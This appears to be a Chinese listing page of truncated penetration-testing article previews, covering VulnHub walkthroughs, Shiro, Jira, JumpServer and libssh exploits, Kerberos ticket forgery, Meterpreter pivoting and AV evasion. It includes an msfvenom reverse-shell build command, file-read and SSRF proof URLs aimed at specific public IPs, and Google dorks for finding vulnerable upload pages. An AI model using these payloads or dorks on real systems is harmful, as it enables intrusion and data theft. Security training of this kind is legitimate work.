红队攻击面相关讨论

0x01 前言 FourAndSix2是易受攻击的一个靶机，主要任务是通过入侵进入到目标靶机系统然后提权，并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址： https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02 信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.9是目标靶机系统 2.端口探测 使用Nmap对靶机进行扫描 nmap -A 192.168.1.9 查询到开放的端口及服务：22-ssh、111-rpcbind、2049-nfs、612-mountd 0x03 漏洞利用 1.nfs漏洞利用 开放2049端口，nmap探测显示为nfs服务，使用metasploit进行扫描可挂载目录 msf > use auxiliary/scanner/nfs/nfsmount msf auxiliary(scanner/nfs/nfsmount) > show options Module options (auxiliary/scanner/nfs/nfsmount): NameCurrent Setting Required Description ------------------- -------- ----------- PROTOCOLudp yes The p…

一、信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址，命令如下： root@kali2018:~# nmap -A 192.168.1.13 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 01:18 EST Nmap scan report for 192.168.1.13 Host is up (0.0014s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp openssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA) | 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA) |_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519) 80/tcp openhttp Apache httpd 2.4.18 ((Ubuntu)) | http-rob…

0x00 GreatSCT简介 GreatSCT目前得到了@ConsciousHacker的支持，该项目名为Great SCT（Great Scott）。Great SCT是一个用于生成应用程序白名单绕过的开源项目。此工具适用于红队和蓝队。它是一种用来生成Metasploit payload的工具，可绕过常见的防病毒解决方案和应用程序白名单解决方案。 您可以从这里下载：https://github.com/GreatSCT/GreatSCT 0x01 安装和使用 首先必须下载并安装它才能开始使用Great SCT。运行以下命令从github下载Great SCT，并在安装时注意其依赖工具。 这有助于通过使用以下工具绕过Applocker策略： Installutil.exe： 安装程序工具是一款命令行工具，允许您通过运行安装程序组件来安装和卸载特定程序集中的服务器资源。 Msbuild.exe： Microsoft Build Engine是一个用于构建应用程序的平台。这个引擎，也称为MSBuild。 Mshta.exe： Mshta.exe运行Microsoft HTML应用程序，Windows OS实用程序负责运行HTA（HTML应用程序）文件。我们可以运行JavaScript或Visual的HTML文件。 Regasm.exe：程序集注册工具读取程序集内的元数据，并将必要的记录添加到注册表中,从而允许COM客户端透明地创建.NET框架类。 Regsvcs.exe： RegSvcs表示Microsoft .NET远程注册表服…

1. 简介我搭建了一个Spring heapdump泄露shiro key从而RCE的漏洞环境，Github地址：https://github.com/P4r4d1se/heapdump_shiro_vuln 漏洞利用条件： Spring Shiro环境存在heapdump文件泄露存在可利用链2. 漏洞原理Shiro相关的漏洞原理和调试分析已经有很多大佬分享过了，这里不再赘述，这里主要针对这个漏洞环境进行说明： （1）Spring其实是有自己默认安全框架的，叫Spring Security，但可能有的开发用Shiro用习惯了，将Spring Securiy替换成了Shiro，这种情况并不少见，比如若依就是Spring shiro。 （2）在有key的情况下，即使是最新版的Shiro也一样存在漏洞，而且在很多时候都会因为开发、部署等问题导致shiro key的泄露。 （3）Shiro大于1.2.4的版本中，在没有开发人员人工干预的情况下key改为了随机生成，这个随机生成是在每次启动Web环境的时候，重启前这个key不会改变，可以在JVM虚拟机内存里找到。 （4）Spring的heapdump文件就是从JVM虚拟机内存导出的。 综上所述导致了这个组合漏洞的产生。 3. 漏洞演示加载漏洞环境后，可以看到Shiro版本为1.8.0： 访问8080端口的/actuator/heapdump获取heapdump文件： 获取其中的shiro key，我常用的有两种方式： （1）JDumpSpider：https://github.com/w…

一、前言 HFish 是一款基于 Golang 开发的跨平台多功能主动攻击型蜜罐钓鱼平台框架系统，为了企业安全防护测试做出了精心的打造 发布版本下载链接： https://github.com/hacklcx/HFish/releases Github: https://github.com/hacklcs/HFish多功能 不仅仅支持 HTTP(S) 钓鱼，还支持支持 SSH、SFTP、Redis、Mysql、FTP、Telnet、暗网等蜜罐扩展性 提供 API 接口，使用者可以随意扩展钓鱼模块 ( WEB、PC、APP )便捷性 使用 Golang 开发，使用者可以在 Win + Mac + Linux 上快速部署一套钓鱼平台二、集群搭建1.环境说明：client01:66.42.68.123（客户端1）clinet02:144.202.85.37（客户端1）server:104.156.253.44（服务端）2.服务端安装与配置root@server:~# wget https://github.com/hacklcx/HFish/releases/download/0.6.4/HFish-0.6.4-linux-amd64.tar.gzroot@server:~# tar zxvf HFish-0.6.4-linux-amd64.tar.gz root@server:~# vi config.ini #需要将statuse修改为1，后台密码修改为复杂密码，db_str数据库生产环境建议采用mysql远程…

###HPP参数污染的定义 HTTP Parameter Pollution简称HPP，所以有的人也称之为“HPP参数污染”，HPP是一种注入型的漏洞，攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞，可以被攻击者利用来进行客户端或者服务器端的攻击。 ###HPP参数污染的原理 首先讲下HTTP的参数处理,在跟服务器进行交互的过程中，客户端往往会在GET/POST请求里面带上参数： POST /foo HTTP/1.1 User-Agent: Mozilla/5.0 Host: Host Accept: */* Content-Length: 19 POST /foo HTTP/1.1 User-Agent: Mozilla/5.0 Host: Host Accept: */* Content-Length: 19 如上面的例子所示，这些参数会以名称-值对的形势出现，通常在一个请求中，同样名称的参数只会出现一次。但是在HTTP协议中是允许同样名称的参数出现多次的。大家可以在下面给出的W3School链接上试试看： http://www.w3schools.com/html/tryit.asp?filename=tryhtml_form_checkbox 但是针对同样名称的参数出现多次的情况，不同的服务器的处理方式会不一样，比如看下面的3个例子： http://www.google.com/search?q=italy&am…

什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问，以及协议实现本身的某些协议（例如SMB1-3和MSRPC）。数据包可以从头开始构建，也可以从原始数据中解析，而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具，作为在此库找到可以执行的操作的示例。 有关某些工具的说明，请访问：https://www.secureauth.com/labs/open-source-tools/impacket Impacket中包含以下协议 以太网，Linux“Cooked”数据包捕获 IP，TCP，UDP，ICMP，IGMP，ARP 支持IPv4和IPv6 NMB和SMB1，SMB2和SMB3（高级实现） MSRPC版本5，通过不同的传输协议：TCP，SMB / TCP，SMB/NetBIOS和HTTP 使用密码/哈希/票据/密钥进行简单的NTLM和Kerberos身份验证 部分或完全实现以下MSRPC接口：EPM，DTYPES，LSAD，LSAT，NRPC，RRP，SAMR，SRVS，WKST，SCMR，BKRP，DHCPM，EVEN6，MGMT，SASEC，TSCH，DCOM，WMI 部分TDS（MSSQL）和LDAP协议实现。 获得Impacket 已编译的当前版本和以前的版本 开源分支 程序安装 快速开始 获取最新的稳定版本，将其解压缩并执行命令pip install . 然后在它的目录中运行。 安装要求 Python解释器，…

0x01 ipc$的定义 IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 0x02 ipc$与空连接,139,445端口,默认共享的关系 ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). ipc$与139,445端口: ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭…

0x00 漏洞背景 Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞，原因在于JiraWhitelist这个类的逻辑缺陷，成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析，此漏洞无需任何凭据即可触发。 0x01 影响范围 < 8.4.0 此漏洞是在Jira服务器7.6.0版中引入的，并在7.13.9和8.4.0版中进行了修复 0x02 漏洞复现 Atlassian JIRAv7.13.0 (以该版本为例，该版本存在漏洞)下载地址： https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe 安装过程不再描述（按照提示进行安装，先在官方注册一个账号然后拿到一个试用期序列号并进行安装）。 通过bupsuit进行请求如下，在响应中可以看到成功探测目标系统存在ssrf漏洞： GET /plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:[email protected] HTTP/1.1 Host: 10.206.1.8:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 …

前言 web2 JS混淆加密+CTF例题题解 一个小游戏需要玩到114514分才能得到flag 要玩到114514分要好久好久,所以肯定要想其他解法, 这题有多种解法,修改游戏逻辑(难）解密js混淆加密(中） 解密md5(易） 这里要介绍js混淆 也就采用第二种方法(实际上比赛的时候也是用第二种方法解的) 查看源代码,查看游戏逻辑js 仔细查看一下 function _0x4857(_0x398c7a, _0x2b4590) { const _0x104914 = _0x25ec(); _0x4857 = function (_0x22f014, _0x212d58) { _0x22f014 = _0x22f014 - (0x347 + 0x46a * -0x7 + 0x1cc6); let _0x321373 = _0x104914[_0x22f014]; return _0x321373; }; return _0x4857(_0x398c7a, _0x2b4590); } (function (_0x414f9c, _0x3d4799) { //...................省略大量代码 上述即是js混淆加密的明显特征 对function函数体内容进行了混淆加密 只是解密网站要找好久,网上真正可以解密js混淆的网站很少 https://m.freebuf.com/articles/web/391884.…

0 简介JumpServer是一款开源的堡垒机，是符合4A规范的运维安全审计系统，通俗来说就是跳板机。 2021年1月15日，JumpServer发布安全更新，修复了一处远程命令执行漏洞。由于JumpServer某些接口未做授权限制，攻击者可构造恶意请求获取敏感信息，或者执行相关操作控制其中所有机器，执行任意命令。 影响版本： JumpServer < v2.6.2JumpServer < v2.5.4JumpServer < v2.4.5JumpServer = v1.5.91. 漏洞分析看修复代码的commit记录：https://github.com/jumpserver/jumpserver/commit/f04e2fa0905a7cd439d7f6118bc810894eed3f3e 发现是给CeleryLogWebsocket类的connect加上了身份认证。 import time import os import threading import json from common.utils import get_logger from .celery.utils import get_celery_task_log_path from .ansible.utils import get_ansible_task_log_path from channels.generic.websocket import JsonWebsocketConsumer logger = get_logger(__na…

0x01 JWT基础知识1.JWT简介JWT全称为JSON Web Token,将json对象作为载体来传输信息。通常用于身份认证和信息交换。JWT 可以使用密钥（HMAC 算法）或使用 RSA 或 ECDSA 的公钥/私钥对自身进行签名2.JWT格式每当用户访问站点中的资源时，对应的请求头认证默认为Authorization: jwt，JTW令牌认证以eyJ开头JWT的数据头部如下：JWT的数据分为三部分：头部（Header），有效载荷（Payload），签名（Signature）三个部分以英文句号.隔开,JWT的内容以Base64URL进行了编码下面就是一个具体token的例子： eyJraWQiOiJrZXlzLzNjM2MyZWExYzNmMTEzZjY0OWRjOTM4OWRkNzFiODUxIiwidHlwIjoiSldUIiwiYWxnIjoiUlMyNTYifQ.eyJzdWIiOiJkdWJoZTEyMyJ9.XicP4pq_WIF2bAVtPmAlWIvAUad_eeBhDOQe2MXwHrE8a7930LlfQq1lFqBs0wLMhht6Z9BQXBRos9jvQ7eumEUFWFYKRZfu9POTOEE79wxNwTxGdHc5VidvrwiytkRMtGKIyhbv68duFPI68Qnzh0z0M7t5LkEDvNivfOrxdxwb7IQsAuenKzF67Z6UArbZE8odNZAA9IYaWHeh1b4OUG0OPM3saXYSG-Q1R5X_5nlWogHHYwy2kD9v4nk1BaQ5kHJI…

0x01 SPN定义 服务主体名称（SPN）是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例，则每个实例都必须具有自己的SPN。如果客户端可能使用多个名称进行身份验证，则给定的服务实例可以具有多个SPN。例如，SPN总是包含运行服务实例的主机名称，所以服务实例可以为其主机的每个名称或别名注册一个SPN。 0x02 SPN扫描 spn扫描也可以叫扫描Kerberos服务实例名称，在Active Directory环境中发现服务的最佳方法是通过“SPN扫描”。通过请求特定SPN类型的服务主体名称来查找服务，SPN扫描攻击者通过网络端口扫描的主要好处是SPN扫描不需要连接到网络上的每个IP来检查服务端口。SPN扫描通过LDAP查询向域控制器执行服务发现。由于SPN查询是普通Kerberos票据的一部分，因此如果不能被查询，但可以用网络端口扫描来确认。 1.SPN格式 SPN = serviceclass “/” hostname [“:”port] [“/” servicename] serviceclass = mssql servicename =sql.bk.com 其中： serviceclass:标识服务类的字符串，例如Web服务的www hostname:一个字符串，是系统的名称。这应该是全限定域名（FQDN）。 port:一个数字，是该服务的端口号。 servicen…

0x00 前言简介 当Active Directory首次与Windows 2000 Server一起发布时，Microsoft就提供了一种简单的机制来支持用户通过Kerberos对Web服务器进行身份验证并需要授权用户更新后端数据库服务器上的记录的方案。这通常被称为Kerberos double-hop issue(双跃点问题)，需要委派才能使Web服务器在修改数据库记录时模拟用户操作。 0x01 Kerberos Unconstrained Delegation（Kerberos无约束委派） Microsoft在Windows 2000中已添加了Kerberos“无约束委派”功能。域管理员可以通过勾选第二个复选框来启用此委派级别。第三个复选框用于“约束委派”，它要求在启用了委派的计算机上列出特定的Kerberos服务。 PowerShell查找Kerberos无约束委派： 使用Active Directory PowerShell模块的Get-ADComputer发现Kerberos无约束委派的计算机是比较容易。 无约束的委托：TrustedForDelegation = True 约束委派：TrustedToAuthForDelegation = True 0x02 Kerberos通信流程 让我们遵循标准的Kerberos通信流程，这是一个描述Kerberos如何工作的快速示例： 用户使用用户名和密码登录 1A.密码转换为NTLM哈希且时间戳用哈希加密，并把它作为身份验证票证（TGT）请求（AS-RE…

0x01白银票据(Silver Tickets)定义 白银票据(Silver Tickets)是伪造Kerberos票证授予服务（TGS）的票也称为服务票据。如下图所示，与域控制器没有AS-REQ 和 AS-REP（步骤1和2），也没有TGS-REQ / TGS-REP（步骤3和4）通信。由于银票是伪造的TGS，所以没有与域控制器通信。 0x02白银票据的特点 1.白银票据是一个有效的票据授予服务（TGS）Kerberos票据，因为Kerberos验证服务运行的每台服务器都对服务主体名称的服务帐户进行加密和签名。 2.黄金票据是伪造TGT并且有效的获得任何Kerberos服务，而白银票据是伪造TGS。这意味着白银票据仅限于特定服务器上的任何服务。 3.大多数服务不验证PAC（通过将PAC校验和发送到域控制器进行PAC验证），因此使用服务帐户密码哈希生成的有效TGS可以完全伪造PAC 4.攻击者需要服务帐户密码哈希值 5.TGS是伪造的，所以没有和TGT通信，意味着DC从验证过。 6.任何事件日志都在目标服务器上。 0x03创建白银票据 为了创建或伪造白银票据，攻击者必须获得目标服务账号的密码hash值。如果目标服务正在使用中的帐户（如MS SQL）下运行，则需要服务帐户密码哈希以创建银票。使用Kerberoast（https://github.com/nidem/kerberoast）破解服务帐户密码是识别目标服务相关密码数据的一种有效防范。计算机主机服务也是最常见的服务，它是利用Windows文件共享…

0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据（TGT），也被称为认证票据。如下图所示，与域控制器没有AS-REQ或AS-REP（步骤1和2）通信。由于黄金票据是伪造的TGT，它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据，因为它是由域Kerberos帐户（KRBTGT）加密和签名的 。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。 黄金票据的条件要求： 1.域名称[AD PowerShell模块：（Get-ADDomain）.DNSRoot] 2.域的SID 值[AD PowerShell模块：（Get-ADDomain）.DomainSID.Value] 3.域的KRBTGT账户NTLM密码哈希 4.伪造用户名 一旦攻击者拥有管理员访问域控制器的权限，就可以使用Mimikatz来提取KRBTGT帐户密码哈希值。 0x02黄金票据局限性 黄金票据 “欺骗”了当前域的管理权限，当KRBTGT帐户密码哈希显示在作为多域AD的林一部分的子域中时存在此局限性。因为是根（root）域包含全森林管理组Enterprise Admins。由于Mimikatz通过相对标识符（RID）向票据添加了组成员资格，因此Kerberos票据中的519（企业管理）RID在其创建的域中（基于KRBTGT帐户域）被标识为本地。如果通过获取域SID和…

0x00 漏洞描述 漏洞存在于kindeditor编辑器里，你能上传.txt和.html文件，支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中 这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面，直接POST到/upload_json.*?dir=file，在允许上传的文件扩展名中包含htm,txt：extTable.Add("file","doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2") 0x01 批量搜索 在google中批量搜索： inurl:/examples/uploadbutton.html inurl:/php/upload_json.php inurl:/asp.net/upload_json.ashx inurl://jsp/upload_json.jsp inurl://asp/upload_json.asp inurl:gov.cn/kindeditor/ 0x02 漏洞问题 根本脚本语言自定义不同的上传地址，上传之前有必要验证文件 upload_json.* 的存在 /asp/upload_json.asp /asp.net/upload_json.ashx /jsp/upload_json.jsp /php/upload_json.php 可目录变量查看是否存在那种脚本上传漏洞: …

0x00 kkFileview存在任意文件读取漏洞 漏洞描述 Keking KkFileview是中国凯京科技（Keking）公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞，该漏洞源于存在通过目录遍历漏洞读取任意文件，可能导致相关主机上的敏感文件泄漏。 漏洞影响 kkFileview <=3.6.0 fofa查询 body="kkFile：View" 漏洞证明 http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd 0x01 kkFileView SSR 漏洞 漏洞描述 kkFileview v4.1.0存在SSRF漏洞，攻击者可以利用此漏洞造成服务器端请求伪造（SSRF），远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。 漏洞影响 kkFileview =v4.1.0 漏洞证明 http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn 0x03 kkFileView XSS漏洞 漏洞描述 kkFileview v4.1.0存两处XSS漏洞，可能导致网站cookies泄露。 漏洞影响 kkFileview =v4.1.0 漏洞证明 http://www.baidu.com/test.txt">…

0x00 漏洞描述 libssh 0.6 及以上的版本，在服务端的代码实现中存在身份认证绕过漏洞。在向服务端认证的流程中，攻击者通过将 SSH2_MSG_USERAUTH_REQUEST 消息替换为 SSH2_MSG_USERAUTH_SUCCESS，即可在无需任何有效凭证的情况下认证成 0x01 漏洞影响版本 libssh 0.8.x - 0.8.3 libssh 0.7.x - 0.7.5 libssh 0.6.x 0x02 漏洞检测 1.nmap扫描libssh版本 nmap -p 2222 -n-Pn -T5 -sC -Sv 149.*.*.85 2.Shodan.io libSSH 0x03 漏洞复现 1.最好在windows上运行脚本，在linux上运行脚本出现很多坑（很多依赖脚本安装有问题）Windows上安装python3，然后使用以下命令进行安装脚本运行依赖包： pip3 installl paramiko 2．漏洞靶机部署，这里采用vulhub进行部署。（本机采用ubuntu16.04） root@libssh:~# git clone https://github.com/vulhub/vulhub.git root@libssh:~# cd vulhub/ root@libssh:~/vulhub# cd libssh/CVE-2018-10933/ root@libssh:~/vulhub/libssh/CVE-2018-10933# docker-com…

0x01 漏洞前言 Google Project Zero的网络安全研究人员发布了详细信息，并针对自内核版本3.16到4.18.8以来Linux内核中存在的高严重性漏洞的概念验证（PoC）漏洞利用。由白帽黑客Jann Horn发现，内核漏洞（CVE-2018-17182）是Linux内存管理子系统中的缓存失效错误，导致释放后使用漏洞，如果被利用，可能允许攻击者获得根权限目标系统上的特权。免费使用后（UAF）漏洞是一类内存损坏错误，非特权用户可利用这些错误来破坏或更改内存中的数据，从而导致拒绝服务（系统崩溃）或升级权限以获得管理权限访问系统Linux的内核漏洞于9月18日在OSS-安全邮件列表中公开，并在第二天在上游支持的稳定内核版本4.18.9,4.14.71,4.9.128和4.4.157中进行了修补。在58年3月16日版本中也有一个修复程序。为版本4.15.0-34.37的Ubuntu 18.04，内核linux-image-4.15.0-34-generic附加了一个丑陋的漏洞。它需(40min~1hour)在弹出root shell之前运行。 0x02 漏洞影响版本 Linux kernel 4.18.8及之前版本 0x03 漏洞复现 1. 本次复现环境：ubuntu18.04*64 内核版本：linux-image-4.15.0-34-generic 2. 添加更新源 sudo vi /etc/apt/sources.list deb-src https://mirrors.tuna.tsinghua…

0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。 最后,Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。在Metasploit Framework中，Meterpreter是一种后渗透工具，它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的，它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。其中，攻击者与目标设备中Meterpreter的通信是通过Stager套接字实现的meterpreter作为后渗透模块有多种类型，并且命令由核心命…

0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马： msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2，监听端口为4444，文件输出格式为exe并保存到路径/tmp/hack.exe 2.执行监听 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 172.16.11.2 show options 输入exploit命令开启我们配置的模块进行监听： 3.上传并执行木马 通过脚本木马上传并运行，此处假设我们通过一系列的渗透测试得到了目标机器的webshell。我们通过脚本木马的文件管理功能把我们上述生成的木马hack.exe上传成功，并且我们得知，该程序的绝对路径为： c:\www\hack.exe 接着，我们尝试通过脚本木马的命令执行功能运行我们上述上传的的木马， c://www//hack.exe/为避免字符转义，路径这里我们使用的是// 那么在执行之后，我们看到大型脚本木马显示为请稍后的状态，我们切换到之前监听…

0x01 meterpreter多级内网代理穿透 1.Pivoting 基本上可以概括为，在正常情况下仅仅只是通过利用被控制的计算机我们可能依旧无法进行网络访问。假设一台被控制的计算机连接有多个网络，将其作为我们的跳板，那么网络隔离的手段对我们来说就形同虚设。跟着这个思路，攻击者在被控制的跳板主机上执行路由操作，进而访问隐藏的网络。对新发现网络发起的每个请求都会通过中间的双网卡跳板传输，形象化一点说来就像是洞子一般。 就如上面所示的拓扑图，设备有两张网卡可访问192.168.1.0/24以及192.168.10.0/24两个网络。在正常情况下，这两个网络之间是不能相互访问的，除非有定义路由规则。根据该结构，授权用户（使用两张网卡的计算机）可访问DMZ区内的一些服务。 2.第一层双网卡中转跳板及端口转发 根据我们的攻击场景，先拿下命名为RD的主机然后获取到的meterpreter shell，RD能连接到DMZ网络。随后，在信息收集过程中确定了目标有两张网卡。注意：环境中的路由器在两个网络之间并没有联通。 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 172.16.0.20 LHOST =&gt…

0×01 静态检测与对抗 1.静态分析原理 简单的来说，就是通过特征码识别静态文件，杀软会扫描存在磁盘上的镜像文件，如果满足特征码，就识别为恶意软件。 恶意软件匹配规则yara匹配恶意软件的时候就是用的这样的方式。 通过特征来识别抓HASH工具QuarksPwDump，yara规则如下（查看源码) /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule QuarksPwDump_Gen : Toolkit { meta: description = "Detects all QuarksPWDump versions" author = "Florian Roth" date = "2015-09-29" score = 80 hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa" hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f" hash3 = "a59be92bf4cce04335bd1a1fcf0…

0x00 MHN蜜罐介绍 MHN（Modern Honey Network）：开源蜜罐，简化蜜罐的部署，同时便于收集和统计蜜罐的数据。用ThreatStream来部署，数据存储在MOngoDB中，安装了入侵检测系统的部署传感器Snort、Kippo、Conpot和Dionaea。收集的信息可以通过Web接口进行展示。据官方说法，目前经测试支持部署MHN服务器的系统有Ubuntu 14.04, Ubuntu 16.04, Centos 6.9 github地址（https://github.com/threatstream/mh） 0x01 支持蜜罐类型 Snort Suricata Dionaea Conpot Kippo Amun Glastopf WordPot ShaockPot P0f 0x02 MHN架构 0x03 MHN安装与使用 1.Ubuntu安装MHN管理端 # 操作系统：ubuntu16.04系统更新和自动化脚本安装 sudo apt update sudo apt upgrade -y sudo apt-get install git -y cd /opt sudo git clone https://github.com/threatstream/mhn.git cd mhn / sudo ./install.sh # 配置服务器信息，这里的邮箱与密码就是安装完成后的Web后台密码 Do you wish to run in Debug mode?: y/n…